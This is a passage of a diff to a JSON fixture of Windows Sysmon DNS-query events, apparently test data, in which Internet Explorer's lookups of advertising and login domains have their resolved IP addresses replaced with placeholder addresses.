SystemTime='2019-07-18T03:34:03.029260200Z'/\u003e\u003cEventRecordID\u003e89\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.733\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003elogin.live.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -1193,7 +1193,7 @@ "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "version": 5, @@ -1212,7 +1212,7 @@ "ProcessId": "2736", "QueryName": "dis.criteo.com", "QueryStatus": "0", - "QueryResults": "::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792" }, @@ -1236,7 +1236,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -1255,7 +1255,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.792", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1277,7 +1277,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -1295,7 +1295,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;", + "QueryResults": "type: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.809", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1314,7 +1314,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1326,7 +1326,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.821", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1353,7 +1353,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -1372,7 +1372,7 @@ "ProcessId": "2736", "QueryName": "ssum-sec.casalemedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;" + "QueryResults": "type: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;" }, "level": "information", "process": { @@ -1392,7 +1392,7 @@ { "@timestamp": "2021-05-05T15:30:51.696Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -1416,7 +1416,7 @@ "ProcessId": "2736", "QueryName": "protected-by.clarium.io", "QueryStatus": "0", - "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -1434,7 +1434,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 